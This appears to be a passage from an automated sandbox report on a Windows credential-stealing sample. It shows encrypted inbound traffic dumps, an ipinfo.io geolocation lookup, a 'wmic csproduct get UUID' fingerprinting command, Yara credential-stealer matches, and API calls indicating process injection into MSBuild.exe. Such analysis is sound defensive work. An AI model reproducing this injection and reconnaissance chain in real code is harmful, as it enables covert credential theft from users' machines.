f7 db 0f 1a c5 cf bc 0b aa bc Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: a9 17 4c 6c fb 4c ae 05 ce da 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c ba 7c 1e 1a 90 24 ea 9b 5a d2 4c ea e1 27 61 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 21 4c 7e a5 26 72 23 4c 59 ac bc 89 ae 05 90 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 05 0e 6a 81 b2 b4 d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 7f 1d 38 f0 0f 2d ab 59 8a 60 4c 59 0a ac 9c e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c Data Ascii: LlLL~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+Ll\|$ZL'a7L+LlfLLY!L~&r#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYjL)L~KLLY8-Y`LYLxLY2L+LlcLLYL~LLYJL+'L
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: 86 4c ae 79 3a 4d c2 4c 7e da 4c ea 4f 10 e6 3f 4c 2b 0e 05 90 41 b0 b4 1f 30 95 d1 74 f0 b9 10 66 1a fd 68 e8 37 e2 aa 7e 9c 05 59 8a 06 d5 d0 b9 f6 72 4d 4c ea 97 4c 59 28 6f d9 56 7e 9c b7 c0 14 7f 47 41 7d 4c 7e d1 4c ea 38 eb 1d a0 29 fd 63 22 e5 59 66 a2 df 4c 59 23 4c 7e 9b 6d 5a 3c c3 b5 c2 47 d2 a1 7e 9c dd 4c ae 80 4c 59 ef c9 8a 84 cc 2a bc 3a 4d d6 9a 0d 30 47 d1 77 0b d8 26 15 11 c0 eb 78 c0 a6 f0 02 49 ad 37 b7 22 f6 7c 9e 6b 4c ae 26 ee b9 e4 74 f0 b4 5a 4e 81 f5 b2 ca 91 e5 2f 4c 6c d7 4c ae 7a eb 1d 48 e0 66 e4 17 42 69 f5 b2 25 91 e5 b3 4c 6c 3c 4c ae 05 eb 1d 6c 7a ea d8 21 c6 65 c4 c2 49 d7 c1 60 66 e3 d8 d3 06 fb fd 68 69 b7 30 1e 4c ea ad e4 a1 67 14 01 34 5d bc 06 73 36 9f f5 b2 42 e0 66 42 4c ea ad 4c 59 a3 38 6d a8 fb 78 8a 66 a2 Data Ascii: Ly:ML~LO?L+A0tfh7~YrMLLY(oV~GA}L~L8)c"YfLY#L~mZ<G~LLY*:M0Gw&xI7"\|kL&tZN/LlLzHfBi%Ll<Llz!eI`fhi0Lg4]s6BfBLLY8mxf
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: 54 50 2b 4c 7e 43 5a 4e 0d a9 5c 60 4c 2b 07 31 77 32 cd 2f a0 d1 65 97 4c 7e 20 36 a2 94 4c 59 d8 4c 2b b5 4c 6c bb 7c 1e 64 4c 59 7f 4c 7e 5c a1 06 7c 4c 59 27 1f 3a 50 10 c5 5b 66 a2 dc 4c 59 a4 2a ba 5c 7b ae 2b 54 50 4e 4c 2b 97 a9 a8 da 48 9b 82 4c 59 86 63 e4 c5 8e 6b be 3a 4d d2 4c 2b d4 c2 17 80 4c ae 6a 4c 59 74 4c 7e 26 10 66 76 4c 59 39 4c 2b 68 66 e3 68 4c ae c7 5e c8 a3 f3 b7 3e 21 c6 0d 4c 59 e1 1a cd 68 4b 18 32 e9 2a 1f 2f 7a 86 7a ea 62 21 c6 d9 15 11 33 d7 c1 41 6e 4d b6 c6 12 61 4c 59 59 fc cc 95 7d 8a 74 54 50 6f b2 55 0e a9 a8 b3 9d bf 3a 7c a8 29 f6 72 1d 4c ea a3 49 ad 28 7e 49 2f a2 65 da 4c ae 67 1f 89 a8 88 cb 41 4c ea 50 97 92 25 8e e8 6e 7e 9c 35 4c ae 15 e0 04 7d f6 72 e9 4c ea 73 4c 59 b8 1a cd c2 4c 6c 4d 4c ae 5c 10 e6 0b Data Ascii: TP+L~CZN\`L+1w2/eL~ 6LYL+Ll\|dLYL~\\|LY':P[fLY\{+TPNL+HLYck:ML+LjLYtL~&fvLY9L+hfhL^>!LYhK2/zzb!3AnMaLYY}tTPoU:\|)rLI(~I/eLgALP%n~5L}rLsLYLlML\
2024-07-27 09:37:20 UTC	741	IN	Data Raw: f0 82 87 12 b7 fd 68 89 5d 79 88 66 e3 f4 80 54 cd f5 b2 ee 5d 6c d0 4c ea 7e 4c 59 71 38 6d cf 4c 6c d5 ed 0f 39 49 ad 89 91 44 e2 80 36 21 4c 59 4d 4c 2b 64 4b 18 e2 b0 b4 b1 ee b9 97 72 77 46 4c ea 33 10 e6 23 6f d9 9d 0a 59 82 4c ae 69 4c 59 76 4c 7e d4 23 c5 16 6e 38 3b 4c 2b c4 4c 6c 5e 59 8a d5 4c 59 0d 4c 7e 31 4c ea 0e 4d 58 47 4c 2b 2e 4c 6c d6 4c ae 7a ea 1c 91 4c 7e 49 4c ea 93 4c 59 a8 38 6d be e4 60 3d 4c ae 63 4c 59 7f eb 78 e5 4c ea 7b 4c 59 30 4c 2b ca 4c 6c 61 4c ae db 4c 59 07 4c 7e 8b 6b 7e 04 4c 59 48 4c 2b 25 4c 6c e9 bc 9e 34 4c 59 af 4c 7e 43 4c ea 9a cb 6e d8 a3 07 9d 4c 6c 37 4c ae 4a ab 5e 7f f6 72 eb 4c ea 70 4c 59 39 9a 0d c1 4c 6c 4f 4c ae d0 4c 59 08 4c 7e 14 4c ea 0a 4c 59 42 4c 2b f7 31 77 11 cd 2f ee 1a fe a4 4c 7e 75 11 Data Ascii: h]yfT]lL~LYq8mLl9ID6!LYML+dKrwFL3#oYLiLYvL~#n8;L+Ll^YLYL~1LMXGL+.LlLzL~ILLY8m`=LcLYxL{LY0L+LlaLLYL~k~LYHL+%Ll4LYL~CLnLl7LJ^rLpLY9LlOLLYL~LLYBL+1w/L~u
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: 4d 83 1f 3a 40 a5 23 c3 4c ae 2a 4c 59 70 c9 8a b2 97 c0 eb e0 04 65 26 31 87 4c 6c 28 4c ae ba d1 65 85 16 00 76 da cc 69 cb 6e f5 ef 19 be 9c 7d 01 18 cb 7e 4c 59 d0 4c 7e be 7b ae b6 7a 0f 3c 1f 3a 6a f1 f5 7c 4c ae 21 4c 59 5e c9 8a 37 1e fb db ac f8 71 4c 2b 88 4c 6c 46 0b d8 98 4d 58 97 9e ef 5e 4c ea 45 4c 59 3b 6f d9 41 fa 79 8b 9d bf 75 4c 59 ee 4c 7e 31 6d 5a 50 d5 d0 2a d1 a6 dc 4c 6c 76 4c ae 4b eb 1d 24 7b eb 38 1e fb 33 4c 59 5f 4c 2b b2 7e 9c fb b8 bb 70 7e aa 49 4c 7e 55 4c ea 7b ee b9 21 3d 0a 5e 1a 48 98 62 a7 3d 89 2c d3 eb 78 b0 47 90 be 05 02 29 cf aa 25 7e 9c 79 4c ae 04 4c 59 8b 9b 5a 32 1e fb 76 92 26 54 4c 2b 3d 4c 6c 43 0b d8 be 9c 4a 2d 06 13 44 a6 f0 40 4c 59 fc 4c 2b 6d e4 60 26 87 53 76 cb 6e ec eb 78 d4 ed d8 79 5e c8 d5 69 Data Ascii: M:@#LLYpe&1Ll(Levin}~LYL~{z<:j\|L!LY^7qL+LlFMX^LELY;oAyuLYL~1mZPLlvLK${83LY_L+~p~IL~UL{!=^Hb=,xG)%~yLLYZ2v&TL+=LlCJ-D@LYL+m`&Svnxy^i
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: 31 fa 79 75 32 77 95 4c 59 4e 4c 7e d2 6d 5a a0 d5 d0 c8 d1 a6 6c 4c 6c 96 4c ae 3b eb 1d c7 7b eb 57 66 30 d1 4c 59 af 4c 2b 12 7e 9c 45 a5 60 77 1a fe 97 91 44 a0 38 ef 3b 4c 59 73 4c 2b 7e 4b 18 c4 8a 59 ef eb 1d 69 f6 72 5d 4c ea 47 4c 59 de 0a 1e 33 59 0b 99 4c ae 77 4c 59 0f 3d 4e 22 3f cb fb 3a 4d ad b7 22 94 84 11 10 fb fb 1e 9c 4a f0 8c ff 4b 6d 5a 30 4c 59 5c 4c 2b a5 1a 48 dc 9d bf de 92 26 4b 4c 7e 57 4c ea fc eb 1d 11 dd fa 32 95 01 88 b0 b4 78 4c 59 e7 4c 7e 04 21 c6 69 71 d4 ad 9a 0d f3 2b 6b 58 be 9c d5 5e c8 ca d8 18 a0 4c ea 1e 4c 59 11 38 6d e9 58 0a ca 87 53 b1 25 62 46 eb 78 6a ed d8 93 5e c8 6b 69 be 63 4c 6c ac 4c ae 15 eb 1d 9c d9 19 e5 1e fb 6f 0a ec a1 4c 2b db 4c 6c 16 0b d8 db 5e c8 fd 00 d7 8e 4c ea 15 4c 59 2f 38 6d 35 4d 6d Data Ascii: 1yu2wLYNL~mZlLlL;{Wf0LYL+~E`wD8;LYsL+~KYir]LGLY3YLwLY=N"?:M"JKmZ0LY\L+H&KL~WL2xLYL~!iq+kX^LLY8mXS%bFxj^kicLlLoL+Ll^LLY/8m5Mm
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: b8 bb b6 71 d4 d1 4c 7e 0b 4c ea 20 ee b9 9d 3d 0a 05 1a 48 c0 62 a7 c5 6b df 3c eb 78 70 aa bc 91 c2 b4 70 4c 2b 89 4c 6c a0 ce 2c aa 2f 7a 86 8c ff ef 6d 5a 44 4c 59 0a 4c 2b 71 1a 48 8a 9d bf 89 92 26 ef 4c 7e 00 4c ea aa eb 1d b5 dd fa 46 95 01 6c b0 b4 0e 4c 59 30 4c 7e 90 21 c6 dd 71 d4 79 9a 0d 84 2b 6b fc be 9c 83 5e c8 2d d8 18 54 4c ea 4a 4c 59 b5 38 6d 1f 58 0a 2d 87 53 c5 25 62 09 24 60 de ed d8 77 5e c8 df 69 be d7 4c 6c 78 4c ae 41 eb 1d c8 d9 19 33 1e fb 30 54 50 55 4c 2b 3c 4c 6c 42 0b d8 3c 5e c8 63 2f 5f 5a 4c ea 41 4c 59 bb 38 6d 61 4d 6d 27 87 53 71 4c 59 ea 4c 7e 15 6d 5a 7c da 7c 0e d1 a6 d8 4c 6c 72 4c ae 3b ee b9 df b3 f7 94 c0 77 17 4c 59 5b 4c 2b 72 4b 18 df b8 bb 2a 71 d4 bd 4c 7e 51 4c ea 5f ee b9 d2 0a 1e 3f 3f dd a5 4c ae 5f Data Ascii: qL~L =Hbk<xppL+Ll,/zmZDLYL+qH&L~LFlLY0L~!qy+k^-TLJLY8mX-S%b$`w^iLlxLA30TPUL+<LlB<^c/_ZLALY8maMm'SqLYL~mZ\|\|LlrL;wLY[L+rK*qL~QL_??L_
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: d8 a4 e0 66 a4 4c ea 3a 4c 59 7e a3 07 1a 9c 7d 6e 27 e3 9a 4c 59 44 4c 7e 1a 7b ae 87 cc d8 39 6f d9 67 4c 6c 98 4c ae e2 3a 4d 7d 9e ef 4d 61 84 ee 4c 59 a5 4c 2b 98 4b 18 65 9d bf 8c 8c 98 32 4c 7e aa 4c ea 55 eb 1d 4c 1f 3a 4d 27 a1 0e 4c ae 91 4c 59 fe c9 8a 57 4d eb 5c 5b bc 03 4c 2b 68 4c 6c 62 7c 1e 6c da 7c 00 fa 6b fe 4c ea e5 4c 59 4b 6f d9 5d 22 e5 0c d8 0b 07 4c 59 1d 4c 7e c5 7b ae 2a da 7c e2 cb dc 3e 4c 6c 05 4c ae 4f ee b9 94 7b eb c0 c0 77 43 4c 59 ff 4c 2b c2 7e 9c 9c 6d 8f c7 3a 4d e4 72 77 96 af 9b ec cb 6e 21 cf aa 29 7e 9c 71 4c ae 08 4c 59 83 9b 5a 1e 1e fb 7a 92 26 58 4c 2b 35 4c 6c bf 0b d8 b6 9c 4a 25 06 13 48 a6 f0 bc 4c 59 f4 4c 2b 65 e4 60 2a 87 53 7a cb 6e e4 eb 78 d8 ed d8 71 5e c8 d9 69 be d1 4c 6c 5f 4c ae b6 eb 1d 7f d9 Data Ascii: fL:LY~}n'LYDL~{9ogLlL:M}MaLYL+Ke2L~LUL:M'LLYWM\[L+hLlb\|l\|kLLYKo]"LYL~{\|>LlLO{wCLYL+~m:Mrwn!)~qLLYZz&XL+5LlJ%HLYL+e`Sznxq^iLl_L
2024-07-27 09:37:20 UTC	1369	IN	Data Raw: 5e 4c ea 45 4c 59 bf 38 6d 5e 93 47 00 14 c1 6f c4 c2 ee 4c 7e 01 4c ea d5 d1 65 2a d1 a6 fa 2b 6b c1 6b a8 ff 2f 7a 20 9e ef df 28 3c 33 4c 59 5f 4c 2b 76 4b 18 5a 19 ca 82 5e c8 14 a1 24 55 4c ea 4b 4c 59 b4 38 6d bb 9c 7d 20 3d 5f 7b 4c 59 e5 4c 7e bb 7b ae e6 4d 58 5d e9 7c d6 4c 6c 79 4c ae 34 ee b9 2a 7b eb 56 a8 bf 1c 4c 59 54 4c 2b 9d 7e 9c cc a2 67 25 71 d4 43 4c 7e 5b 4c ea f4 eb 1d d9 0a 1e d4 9b 89 af 4c ae 70 4c 59 08 3d 4e c8 a1 06 46 b7 f2 49 47 d2 ec 0a 59 73 4c ae 0a 4c 59 50 c9 8a 0b b8 2f 66 6f 39 5a 4c 2b 37 4c 6c 08 4c ae 83 da 7c c5 35 b3 50 4c ea be 4c 59 15 6f d9 6e 6e 4d b0 59 8a 73 54 50 8f d7 83 ad 09 9c f1 9c 4a 0c cf aa 20 7e 9c 5c 4c ae 01 4c 59 3e 9b 5a 17 1e fb 73 92 26 51 4c 2b 38 4c 6c b6 0b d8 bb 9c 4a 28 06 13 41 a6 f0 Data Ascii: ^LELY8m^GoL~Le+kk/z (<3LY_L+vKZ^$ULKLY8m} =_{LYL~{MX]\|LlyL4{VLYTL+~g%qCL~[LLpLY=NFIGYsLLYP/fo9ZL+7LlL\|5PLLYonnMYsTPJ ~\LLY>Zs&QL+8LlJ(A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	34.117.59.81	443	5992	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:37:21 UTC	63	OUT	GET /json HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-07-27 09:37:22 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 319 content-type: application/json; charset=utf-8 date: Sat, 27 Jul 2024 09:37:22 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-27 09:37:22 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Target ID:	0
Start time:	05:37:15
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\Ycj3d5NMhc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Ycj3d5NMhc.exe"
Imagebase:	0x3a0000
File size:	294'400 bytes
MD5 hash:	10DA3CC4689926DE08A0BA47481ACEAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:37:19
Start date:	27/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x610000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:37:21
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:37:21
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	"wmic" csproduct get UUID
Imagebase:	0x7e0000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:37:21
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	25.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.5%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFB4B05164D Relevance: 1.7, APIs: 1, Instructions: 210
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetReadFile.WININET ref: 00007FFB4B0517B7

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 67516623db0b8f420f5ed767b8fcebd8a9c231da7b1354a906ea337bc3f59f97
Instruction ID: 2d63e23c2c3abef1eb0b38db3ecf656cad38b587d9bc0a5f0f5e7caf70d59d44
Opcode Fuzzy Hash: 67516623db0b8f420f5ed767b8fcebd8a9c231da7b1354a906ea337bc3f59f97
Instruction Fuzzy Hash: 7E615970908A5C8FDB58DF68C885BE9BBF0FB29315F1041AED449E3651DB70A985CF81

Function 00007FFB4B0511B9 Relevance: 1.8, APIs: 1, Instructions: 258
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET ref: 00007FFB4B051377

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: d1a526d5ef9fcd985a8a0d6242f12847966277c9a4a4eec3ef1d2552924aa9df
Instruction ID: 1b1766e41f69b103da5fcd4eb6b01009cc6b269c0fc413a9abd3d2c541453b9f
Opcode Fuzzy Hash: d1a526d5ef9fcd985a8a0d6242f12847966277c9a4a4eec3ef1d2552924aa9df
Instruction Fuzzy Hash: 07812670908A5C8FDB98EF58C854BE9BBF1FB69311F1041AED04EE3661DB75A981CB40

Function 00007FFB4B05140D Relevance: 1.7, APIs: 1, Instructions: 247
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenUrlW.WININET ref: 00007FFB4B0515B2

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 55dcb8e2da87c868de65190bd72a89af1af100bfbd968f58083d4e5476448ca6
Instruction ID: 71e95909ed2cb73d59f875974847d257e827610b52745456d5e2c308886d8d1b
Opcode Fuzzy Hash: 55dcb8e2da87c868de65190bd72a89af1af100bfbd968f58083d4e5476448ca6
Instruction Fuzzy Hash: C5712470908A5C8FDB98EF58C894BE9BBF1FB69311F1041AED00EE3651DB74A980CB41

Function 00007FFB4B056151 Relevance: 1.7, APIs: 1, Instructions: 220
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32 ref: 00007FFB4B0562D0

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 15f70c079488e5c45eaa27e674e9c704dc252886e2e4f79f206d174d82c56a47
Instruction ID: c751c4564c45d29350d3a960be5ed7c5e4719e74fc54a285a40c11dbfb5d552e
Opcode Fuzzy Hash: 15f70c079488e5c45eaa27e674e9c704dc252886e2e4f79f206d174d82c56a47
Instruction Fuzzy Hash: 31613870908A1C8FDB94DF68C885BE9BBF1FB69311F1082AAD44DE3251CB34A985CF40

Function 00007FFB4B05635D Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32 ref: 00007FFB4B05649B

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9583adb02a8e8d960d308cc515620b18a776092c454a052705d3a06079523417
Instruction ID: a3c826657169050649c2ac030d073d695aaab16eb503a293b970861481fc7a68
Opcode Fuzzy Hash: 9583adb02a8e8d960d308cc515620b18a776092c454a052705d3a06079523417
Instruction Fuzzy Hash: EB511770908A5C8FDF94DF68C885BE9BBF1FB69311F1082AAD44DE3251DB74A985CB40

Function 00007FFB4B055FA8 Relevance: 1.7, APIs: 1, Instructions: 184
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32 ref: 00007FFB4B0560C5

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d4e107e4e90d559bc53b9fe943d5894de2ad846854a7f7964d9b60dd9e0b4147
Instruction ID: 689280cf3d1cffc32f461907772313ce604131cd94344404e5838b3a78e21acb
Opcode Fuzzy Hash: d4e107e4e90d559bc53b9fe943d5894de2ad846854a7f7964d9b60dd9e0b4147
Instruction Fuzzy Hash: 6D51F870908A1C8FDF94EF58C885BE9BBF1FB69311F1091AAD44DE3255CB71A9858F80

Function 00007FFB4B055CBE Relevance: 1.7, APIs: 1, Instructions: 169
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FFB4B055DD5

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6147f995227a8ebb0046ce519cd4ec8cac657f2483a448626223bdc8e7ab729e
Instruction ID: 2293013d69c7e178284c92188bd939045f7be0826b56237b8be3d45abe2ce003
Opcode Fuzzy Hash: 6147f995227a8ebb0046ce519cd4ec8cac657f2483a448626223bdc8e7ab729e
Instruction Fuzzy Hash: 9A511670908A1C8FDB94EFA8C849BEDBBF1FB59311F10826AD449E3255DB749885CF40

Function 00007FFB4B055E49 Relevance: 1.6, APIs: 1, Instructions: 140
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FFB4B055F1F

Memory Dump Source

Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8a9aeaaff5359c2d471f13a941d7f7eb11ea0acd3ba2729e31346308bb5617fb
Instruction ID: e6e411f3ab568b12fabf9fcc177e6f2be2e3a3faac2f831db472c5ed1d755fa5
Opcode Fuzzy Hash: 8a9aeaaff5359c2d471f13a941d7f7eb11ea0acd3ba2729e31346308bb5617fb
Instruction Fuzzy Hash: D2418970D0874C8FDB59EFA8D885AEDBBF0FF56310F1081AAD449E7652DA34A486CB41

Analysis Process: MSBuild.exePID: 5992, Parent PID: 2884COMMON

Execution Graph

Execution Coverage:	20.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25.8%
Total number of Nodes:	295
Total number of Limit Nodes:	33

Executed Functions

Function 059D5E20 Relevance: 4.4, Strings: 3, Instructions: 694
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

S, xrefs: 059D5F47
T, xrefs: 059D6180
#, xrefs: 059D6026

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID: #$S$T
API String ID: 0-2617736706
Opcode ID: 6b30d282f804ea6628eb473a5f68abc2c13cc68ba323c2dad81c760c56a4cb12
Instruction ID: 02015d71e6500ebacd08a65cf33c4c9efe1c5f1d6e24cf282d0a2d44cdb36077
Opcode Fuzzy Hash: 6b30d282f804ea6628eb473a5f68abc2c13cc68ba323c2dad81c760c56a4cb12
Instruction Fuzzy Hash: 0F826D78A052299FDB65DF69D884BD9BBB2BB89300F1081EAD80DA7354DB315E81CF50

Function 00EBD3B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 00EBD474

Strings

buz, xrefs: 00EBD3E5

Memory Dump Source

